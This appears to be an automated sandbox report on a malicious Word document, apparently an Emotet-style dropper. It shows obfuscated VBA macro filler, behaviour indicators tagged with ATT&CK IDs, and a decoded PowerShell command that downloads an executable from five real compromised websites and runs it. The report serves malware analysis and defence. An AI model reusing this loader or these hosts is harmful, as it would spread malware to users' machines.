  'Cambridgeshire bandwidth-monitored Avon Borders Practical Steel Computer Administrator Savings Account Chief Sleek Soft Chips
  connectingksr = Azerbaijanian_Manatsjt + Len("542") 'Wooden reboot Digitized Buckinghamshire deploy PNG Savings Account Devolved Public-key radical Computers & Electronics
  'navigate West Virginia Island synergize Analyst US Dollar engage Product Fantastic Steel Towels mint green online
  Villageqsv = Azerbaijanian_Manatsjt + Len("796") 'USB Jamaican Dollar Virtual Optimization COM Unbranded Rubber Towels ability
  'Sleek Soft Computer infrastructures bluetooth parse New Leu Oklahoma Planner Arkansas Handmade Metal Chips Small Rubber Bike Self-enabling Branch Denar Ergonomic Granite Fish
  Malagasy_Ariarypts = Azerbaijanian_Manatsjt + CStr(withdrawalwlm) 'visualize Handmade Frozen Car Money Market Account demand-driven Directives Park real-time Borders robust product Cook Islands Principal
  'Reverse-engineered client-driven Investment Account white fuchsia Jewelery Investment Account Legacy definition Intelligent Fresh Tuna Steel Shoal
  Wend
  'Lights Savings Account IB Creative JBOD Metal Cambridgeshire viral Borders Licensed Metal Chicken integrate
  '/Anguillafzu
  'Upgradable synthesizing scalable Rustic Wooden Fish transmit Ridges Sleek Fresh Cheese United Kingdom Credit Card Account bypass XML Generic Fresh Chicken
  Azerbaijanian_Manatsjt = "Movies
  Toys & Automotive Solutions Sleek Soft Bacon Analyst override San Marino cross-platform European Unit of Account 9(E.U.A.-9)"
  '/Estoniasbw
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Directives Knolls Delaware circuit mobile Illinois Buckinghamshire Handmade Steel Cheese Multi-layered Guinea Franc bypass deposit Tools, Shoes & Garden
  moderatorjci = Azerbaijanian_Manatsjt + CInt(220) 'Distributed bypass New Mexico Fantastic Soft Ball multi-tasking virtual
  'driver Rustic input Electronics orchid e-services navigate Licensed Granite Car
  Bedfordshirekuj = Azerbaijanian_Manatsjt + Len("617") 'Haven Handcrafted Rubber Shoes Refined Cotton Table violet Personal Loan Account solid state
  'Unbranded Soft Soap Director Tasty Rubber Table Gorgeous Cotton Chair Investment Account quantify silver withdrawal Borders
  lavenderbqa = Azerbaijanian_Manatsjt + CInt(481) 'Personal Loan Account payment Books, Health & Beauty overriding Ameliorated Direct directional
  'Rustic Incredible Fresh Table engineer calculate Sports, Computers & Sports Creek Associate
  indigodvz = Azerbaijanian_Manatsjt + Len("685") 'withdrawal Assistant Ridges quantify index applications Cambridgeshire Metical orange enterprise Bedfordshire Integration
  'Frozen Rwanda Franc Islands reboot Program Walks Plastic pixel Fresh Knolls transparent
  whiteboardtrt = Azerbaijanian_Manatsjt + Len("685") 'South Dakota Handcrafted Metal Keyboard override Maryland innovate Cayman Islands Dollar
  'Associate Administrator Home Loan Account ADP synergistic Trail Row Credit Card Account payment SQL Turnpike Togo
  Pound_Sterlingohn = Azerbaijanian_Manatsjt + CStr(Portsbuz) 'alarm Soft Bedfordshire Investment Account Money Market Account Checking Account CSS neural
  'Security Berkshire Right-sized Arizona Washington bus navigating Beauty Handcrafted Administrator Frozen Wooden
  Wend
  'Gorgeous Plastic Computer Springs Buckinghamshire Fantastic Plastic Shirt Handcrafted Brand Intelligent Rubber Shoes generate black Montana connect navigating
  Surinamenjp
  '/whitepbn
  'back-end monetize Sleek Plastic Sausages Officer Compatible primary
  Azerbaijanian_Manatsjt = "payment Lights circuit collaborative systems back-end Small California"
  '/Handmadeitn
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Automotive, Kids & Toys green generate Squares Concrete enhance invoice
  transmitterzwp = Azerbaijanian_Manatsjt + CInt(232) 'Rubber bypassing pricing structure Security synthesizing matrix Investment Account exuding GB Digitized Sleek Granite Tuna invoice asymmetric lime
  'Baby & Jewelery Group driver Nakfa Designer North Korean Won productivity HTTP Pennsylvania end-to-end Kids & Kids Concrete disintermediate Cambridgeshire
  Specialisthub = Azerbaijanian_Manatsjt + Len("283") 'RAM array next-generation Cambridgeshire invoice Wells orchid primary customized Toys Junctions
  'index mint green encryption New Zealand process improvement Metal Rest Division Awesome Metal Computer
  Checking_Accountizc = Azerbaijanian_Manatsjt + CInt(44) 'Buckinghamshire Industrial backing up indexing 24/7 Graphical User Interface matrix Marketing
  'deposit Delaware Cross-platform Business-focused Integration disintermediate Well Bolivar Fuerte e-enable Markets Dynamic Bedfordshire deposit Operations
  Home__Homeico = Azerbaijanian_Manatsjt + Len("961") 'overriding calculating Tools enable Response Baht Advanced
  'Ramp Causeway mesh Camp backing up Illinois Ridge infrastructure Rustic Kroon interface withdrawal
  calculatingrtz = Azerbaijanian_Manatsjt + Len("446") 'Rubber paradigm Plaza mobile deposit COM blue Walks
  'reinvent Grocery, Movies & Automotive US Dollar Extensions Bahrain Specialist Ameliorated Unbranded compress
  Buckinghamshireqdj = Azerbaijanian_Manatsjt + CStr(paymentwzr) 'pixel ivory Intranet solution-oriented Cedi Designer bus Guyana Factors Handcrafted Rubber Pizza Administrator hard drive Bond Markets Units European Composite Unit (EURCO) payment
  'Wooden calculating payment mobile Berkshire Dong Wooden
  Wend
  'silver strategic program Rustic bypassing invoice Auto Loan Account Outdoors & Garden Rustic Wooden Bacon Lek Unbranded Rubber Chips
  '/Producerkmc
  'Passage Producer transmitter Robust sky blue Soft Cambridgeshire process improvement Licensed Frozen Chair Executive Highway US Dollar Computers & Garden
  Azerbaijanian_Manatsjt = "Facilitator attitude-oriented Pound Sterling Unbranded Soft Idaho"
  '/Personal_Loan_Accountnvw
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'grey Innovative deposit United States of America Identity Infrastructure Industrial & Baby Handmade Soft Pizza Thailand Indiana Guinea-Bissau algorithm deposit
  Productszu = Azerbaijanian_Manatsjt + CInt(161) 'Costa Rican Colon Rue Future Incredible standardization copying benchmark
  'International Fantastic global copying Developer card mobile
  Steeliaa = Azerbaijanian_Manatsjt + Len("821") 'SQL XML real-time invoice Gorgeous Spring
  'Pennsylvania View Officer Cambridgeshire extend upward-trending compress frictionless ivory Grocery & Music Ways Coordinator Generic Frozen Keyboard Auto Loan Account
  programdrf = Azerbaijanian_Manatsjt + CInt(528) 'Optimization SDD Senior firewall optical Circles Tasty Soft Chair Hollow Hills Streamlined magnetic
  'web-enabled Web Unbranded Frozen Bike Practical Frozen Bike incentivize infrastructures Jewelery & Beauty Guinea Program Checking Account Generic Granite Gloves Corners Practical Soft Table Wooden
  Chiefmls = Azerbaijanian_Manatsjt + Len("391") 'cultivate National Investor Applications deposit Central out-of-the-box Refined Frozen Sausages Tokelau Liaison Iceland Krona Dong programming
  'Unbranded Yemen Games, Sports & Kids Practical Plastic Computer Plastic Developer Tasty Fresh Car installation
  digitalzwn = Azerbaijanian_Manatsjt + Len("303") 'solid state Cross-group teal Nigeria Handmade Steel Shirt feed
  'Central e-markets teal generate indigo synthesizing feed invoice Jewelery, Grocery & Clothing Licensed solid state deposit Holy See (Vatican City State) Bypass
  inputflf = Azerbaijanian_Manatsjt + CStr(greyajv) 'calculate pricing structure Park Synergistic Soft optimal ROI supply-chains parsing
  'Handmade Concrete Soap utilisation quantifying Credit Card Account Colorado bandwidth-monitored Skyway Intelligent experiences Incredible Soft Chips payment
  Wend
  'action-items deliver Canada impactful gold back-end virtual
  End Sub"
  File "Humanaoo.bas" (Streampath: "Macros/VBA/Humanaoo") has code: ""
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Contains embedded VBA macros (normalized)
  
  details
  
  Normalized macro string: "http"
  Normalized macro string: "HTTP"
  
  source
  
  File/Memory
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1137 (Show technique in the MITRE ATT&CK™ matrix)
- Creates a writable file in a temporary directory
  
  details
  
  "WINWORD.EXE" created file "%TEMP%\~DF6CF2E1016DFBD351.TMP"
  "WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "Local\ZonesLockedCacheCounterMutex"
  "Local\x64_10MU_ACBPIDS_S-1-5-5-0-62922"
  "Local\ZonesCacheCounterMutex"
  "Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
  "Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
  "Local\x64_10MU_ACB10_S-1-5-5-0-62922"
  "\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-62922"
  "\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-62922"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Drops files marked as clean
  
  details
  
  Antivirus vendors marked dropped file "~__583658295301_1004.doc" as clean (type is "data")
  
  source
  
  Binary File
  
  relevance
  
  10/10
- Loads rich edit control libraries
  
  details
  
  "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at F4960000
  
  source
  
  Loaded Module
  
  ATT&CK ID
  
  T1179 (Show technique in the MITRE ATT&CK™ matrix)
- Loads the .NET runtime environment
  
  details
  
  "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E13F0000
  
  source
  
  Loaded Module
- Process launched with changed environment
  
  details
  
  Process "powershell.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, Path, PROCESSOR_ARCHITECTURE, ProgramFiles"
  Process "powershell.exe" (Show Process) was launched with missing environment variables: "MEOW, PROCESSOR_ARCHITEW6432, PROMPT, VXDIR"
  Process "897.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
  Process "897.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
  Process "897.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
  Process "capprep.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, LOCALAPPDATA, USERDOMAIN, PROCESSOR_ARCHITECTURE, PSModulePath, TEMP, APPDATA, USERPROFILE, TMP, ProgramFiles"
  Process "capprep.exe" (Show Process) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432, LOGONSERVER, HOMEPATH, HOMEDRIVE"
  Process "capprep.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
  Process "capprep.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
- Removes Office resiliency keys (often used to avoid problems opening documents)
  
  details
  
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "T+4")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "H-4")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "J*4")
  "WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1112 (Show technique in the MITRE ATT&CK™ matrix)
- Scanning for window names
  
  details
  
  "WINWORD.EXE" searching for class "mspim_wnd32"
  "WINWORD.EXE" searching for class "MSOBALLOON"
  "WINWORD.EXE" searching for class "MsoHelp10"
  "WINWORD.EXE" searching for class "AgentAnim"
  "WINWORD.EXE" searching for class "Shell_TrayWnd"
  
  source
  
  API Call
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1010 (Show technique in the MITRE ATT&CK™ matrix)
- Spawns new processes
  
  details
  
  Spawned process "powershell.exe" with commandline "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGM ..." (UID: 00025715-00002684, Additional Context: "<# https://www.microsoft.com/ #> $motivatingquq='Intelligentbqv';$modelsvhz = '897';$Assistantopz='Handcraftedcrd';$solid_statezch=$env:userprofile+'\'+$modelsvhz+'.exe';$plumkqj='US_Dollarjsz';$greenjwa=.('n'+'ew'+'-ob'+'ject') neT.webCLienT;$Rustic_Cotton_Fishsvl='http://www.eteensblog.com/2tgmnk/fJZIPCYV/@http://www.palisek.cz/wp-includes/YtgJbWQNtJ/@http://www.mnminfrasolutions.com/wp-admin/zeteXeJYC/@http://abbasargon.com/wp-admin/sqhztj4_dzq3e-019802155/@https://weiqing7.com/ex6/3r2js_ocgr3bew87-538460/'."s`PLiT"('@');$Graphical_User_Interfacezvu='Advancedinf';foreach($US_Dollarrbr in $Rustic_Cotton_Fishsvl){try{$greenjwa."D`owN`LOAdfiLE"($US_Dollarrbr, $solid_statezch);$wirelessfud='worldclassnkp';If ((.('G'+'et-'+'Item') $solid_statezch)."Le`NgTh" -ge 27543) {[Diagnostics.Process]::"s`TArt"($solid_statezch);$arrayvhc='maroonhat';break;$Azerbaijanwjk='calculateufw'}}catch{}}$Guyanalsw='Locksmvo'"), Spawned process "897.exe" (Show Process), Spawned process "897.exe" with commandline "--caaf215f" (Show Process), Spawned process "capprep.exe" (Show Process), Spawned process "capprep.exe" with commandline "--83c0e935" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Contains ability to lookup the windows account name
  
  details
  
  GetUserNameA@ADVAPI32.dll (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  5/10
- Dropped files
  
  details
  
  "~__583658295301_1004.doc" has type "data"
  "897.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  "RE_583658295301_1004.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Fri Oct 4 20:52:48 2019 mtime=Fri Oct 4 20:52:48 2019 atime=Fri Oct 4 20:52:56 2019 length=190976 window=hide"
  "8785896.wmf" has type "ms-windows metafont .wmf"
  "index.dat" has type "data"
  "4F9A5442.wmf" has type "ms-windows metafont .wmf"
  "C2DA935B.wmf" has type "ms-windows metafont .wmf"
  "386260D7.wmf" has type "ms-windows metafont .wmf"
  "3B6F62A9.wmf" has type "ms-windows metafont .wmf"
  "849394EC.wmf" has type "ms-windows metafont .wmf"
  "B231C914.wmf" has type "ms-windows metafont .wmf"
  "85992E05.wmf" has type "ms-windows metafont .wmf"
  "~WRS_1A55B392-6FBE-4E4D-8194-2A5527168528_.tmp" has type "data"
  "443E14AE.wmf" has type "ms-windows metafont .wmf"
  "80E439F.wmf" has type "ms-windows metafont .wmf"
  "98416121.wmf" has type "ms-windows metafont .wmf"
  "N8JKJMHQ1SGAVY4IHO3E.temp" has type "data"
  "5FB2BDA0.wmf" has type "ms-windows metafont .wmf"
  "MSForms.exd" has type "data"
  "~_Normal.dotm" has type "data"
  
  source
  
  Binary File
  
  relevance
  
  3/10
- Drops executable files
  
  details
  
  "897.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  
  source
  
  Binary File
  
  relevance
  
  10/10
- Found a string that may be used as part of an injection method
  
  details
  
  "Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)
  
  source
  
  File/Memory
  
  relevance
  
  4/10
  
  ATT&CK ID
  
  T1055 (Show technique in the MITRE ATT&CK™ matrix)
- Touches files in the Windows directory
  
  details
  
  "WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
  "WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
  "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001d.db"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
  "WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A55B392-6FBE-4E4D-8194-2A5527168528}.tmp"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B1069311-A861-4BFD-9969-2C8C5C826436}.tmp"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{061576E4-2B1D-49B2-BE1F-453A66FB6A6A}.tmp"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{061576E4-2B1D-49B2-BE1F-453A66FB6A6A}.tmp"
  
  source
  
  API Call
  
  relevance
  
  7/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Pattern match: "https://www.microsoft.com/"
  Pattern match: "www.eteensblog.com"
  Pattern match: "l.ri/Smalllalivory"
  Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
  Pattern match: "http://ogp.me/ns/fb#"
  Pattern match: "http://gmpg.org/xfn/11/"
  Pattern match: "http://www.eteensblog.com/xmlrpc.php/"
  Pattern match: "http://www.eteensblog.com/feed/"
  Pattern match: "http://www.eteensblog.com/comments/feed/"
  Pattern match: "www.eteensblog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/css/style.min.css?ver=1.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/css/shoppable-images-front.min.css?ver=1.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/mashsharer/assets/css/mashsb.min.css?ver=3.6.8"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/css/youtube.min.css?ver=1.3.3"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/css/video-playlist.min.css?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/gallery/css/gallery.min.css?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.magnific-popup/magnific-popup.css?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/css/snax.min.css?ver=1.43"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/css/snax-frontend-submission.min.css?ver=1.43"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.tagit/css/jquery.tagit.css?ver=2.0"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.tagit/css/tagit.ui-zendesk.css?ver=2.0"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/froala_editor.min.css?ver=2.3.4"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/froala_style.min.css?ver=2.3.4"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/quick_insert.min.css?ver=2.3.4"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/char_counter.min.css?ver=2.3.4"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/line_breaker.min.css?ver=2.3.4"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=6.0.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/whats-your-reaction/css/main.min.css?ver=1.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/wordpress-popular-posts/public/css/wpp.css?ver=4.2.2"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/all-light.min.css?ver=7.3.2"
  Pattern match: "fonts.googleapis.com/css?family=Roboto%3A400%2C300%2C500%2C600%2C700%2C900%7CPoppins%3A400%2C300%2C500%2C600%2C700&subset=latin%2Clatin-ext&ver=7.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/uploads/dynamic-style-1567123380.css"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?ver=6.0.3"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/snax-extra-light.min.css?ver=7.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/vc-light.min.css?ver=7.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/mashshare-light.min.css?ver=7.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/wp-gdpr-compliance/assets/css/front.css?ver=1567040647"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/js/slideup.js?ver=1.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/includes/shoppable-images/assets/js/shoppable-images-front.js?ver=1.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/js/coupons.js?ver=1.3.2"
  Pattern match: "www.eteensblog.com\/sweet-18yr-old-rion-makes-her-debut\/,title:Sweet+18yr+Old+Rion+Makes+Her+Debut,image:http:\/\/www.eteensblog.com\/wp-content\/uploads\/2019\/08\/rion00001.jpg,desc:This"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/mashsharer/assets/js/mashsb.min.js?ver=3.6.8"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/plupload/moxie.min.js?ver=1.3.5"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/plupload/plupload.min.js?ver=2.1.9"
  Pattern match: "www.eteensblog.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/,ID:,token:1123317ede,debug"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/wordpress-popular-posts/public/js/wpp-4.2.0.min.js?ver=4.2.2"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/modernizr/modernizr-custom.min.js?ver=3.3.0"
  Pattern match: "https://api.w.org/"
  Pattern match: "http://www.eteensblog.com/xmlrpc.php?rsd"
  Pattern match: "http://www.eteensblog.com/wp-includes/wlwmanifest.xml"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot?#iefix"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.woff"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.ttf"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.svg#bimber"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/mode-dark.min.css"
  Pattern match: "http://schema.org/WebPage"
  Pattern match: "http://www.eteensblog.com/"
  Pattern match: "http://www.eteensblog.com"
  Pattern match: "https://www.facebook.com/YOUR_USERNAME/"
  Pattern match: "https://twitter.com/YOUR_USERNAME"
  Pattern match: "http://www.eteensblog.com/?s="
  Pattern match: "http://www.eteensblog.com/the-last-word-information-that-will-free-essay/"
  Pattern match: "http://www.eteensblog.com/die-gefahr-die-anwendung-schreiben-eine-2/"
  Pattern match: "http://www.eteensblog.com/ghost-writing-kein-geheimnis-mehr-2/"
  Pattern match: "http://www.eteensblog.com/die-durchgesickerten-geheimnisse-der-wissenschaftlichen-hausarbeit-aufgedeckt-2/"
  Pattern match: "http://www.eteensblog.com/the-leaked-secret-to-best-online-essay-writers-discovered-2/"
  Pattern match: "http://www.eteensblog.com/short-article-reveals-the-undeniable-facts-about-best-essay-writer-and-how-it-can-affect-you-2/"
  Pattern match: "http://www.eteensblog.com/category/teen-videos/"
  Pattern match: "http://www.eteensblog.com/the-one-thing-to-do-for-what-is-a-term-math-2/"
  Pattern match: "http://www.eteensblog.com/sweet-18yr-old-rion-makes-her-debut/"
  Pattern match: "http://www.eteensblog.com/author/robet/"
  Pattern match: "http://0.gravatar.com/avatar/f3473c0c2d4d166102cde6542292aa62?s=30&d=mm&r=g"
  Pattern match: "https://wordpress.org/plugins/mailchimp-for-wp/"
  Pattern match: "http://www.eteensblog.com/hearsay-deception-and-examples-of-essay-about-myself-3/"
  Pattern match: "http://www.eteensblog.com/author/"
  Pattern match: "http://1.gravatar.com/avatar/?s=30&d=mm&r=g"
  Pattern match: "http://www.eteensblog.com/the-good-the-bad-and-language-translation-4/"
  Pattern match: "http://2.gravatar.com/avatar/?s=30&d=mm&r=g"
  Pattern match: "http://www.eteensblog.com/top-choices-of-structural-formula-chemistry-4/"
  Pattern match: "http://0.gravatar.com/avatar/?s=30&d=mm&r=g"
  Pattern match: "http://www.eteensblog.com/the-secret-to-entropy-chemistry-3/"
  Pattern match: "http://www.eteensblog.com/the-ultimate-brain-chemistry-trick-4/"
  Pattern match: "http://www.eteensblog.com/short-article-reveals-the-undeniable-facts-about-physics-project-and-how-it-can-affect-you-4/"
  Pattern match: "http://www.eteensblog.com/what-to-expect-from-biology-conjugation-4/"
  Pattern match: "http://www.eteensblog.com/lyse-biology-help-4/"
  Pattern match: "http://www.eteensblog.com/page/2/"
  Pattern match: "http://www.eteensblog.com/2019/10/"
  Pattern match: "http://www.eteensblog.com/2019/08/"
  Pattern match: "http://www.eteensblog.com/2015/11/"
  Pattern match: "http://www.eteensblog.com/2015/10/"
  Pattern match: "http://www.eteensblog.com/2015/09/"
  Pattern match: "http://www.eteensblog.com/2015/08/"
  Pattern match: "http://www.eteensblog.com/2015/07/"
  Pattern match: "http://www.eteensblog.com/2015/06/"
  Pattern match: "http://www.eteensblog.com/2015/05/"
  Pattern match: "http://www.eteensblog.com/2015/04/"
  Pattern match: "http://www.eteensblog.com/2015/03/"
  Pattern match: "http://www.eteensblog.com/2015/02/"
  Pattern match: "http://www.eteensblog.com/2015/01/"
  Pattern match: "http://www.eteensblog.com/2014/12/"
  Pattern match: "http://www.eteensblog.com/2014/11/"
  Pattern match: "http://www.eteensblog.com/2014/10/"
  Pattern match: "http://www.eteensblog.com/2014/09/"
  Pattern match: "http://www.eteensblog.com/2014/08/"
  Pattern match: "http://www.eteensblog.com/2014/07/"
  Pattern match: "http://www.eteensblog.com/2014/06/"
  Pattern match: "http://www.eteensblog.com/category/uncategorized/"
  Pattern match: "http://www.eteensblog.com/?snax_login_popup"
  Pattern match: "https://wordpress.org/"
  Pattern match: "http://www.eteensblog.com/wp-login.php"
  Pattern match: "http://www.eteensblog.com/?snax_login_popup=forgot_password"
  Pattern match: "http://www.eteensblog.com/wp-login.php?action=lostpassword"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/g1-socials/css/screen-basic.min.css?ver=1.2.10"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/g1-socials/css/snapcode.min.css?ver=1.2.10"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/lazysizes/lazysizes.min.js?ver=4.0"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/youtube.js?ver=1.3.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/js/mejs-renderers/vimeo.min.js?ver=1.3.3"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/js/playlist.js?ver=1.3.3"
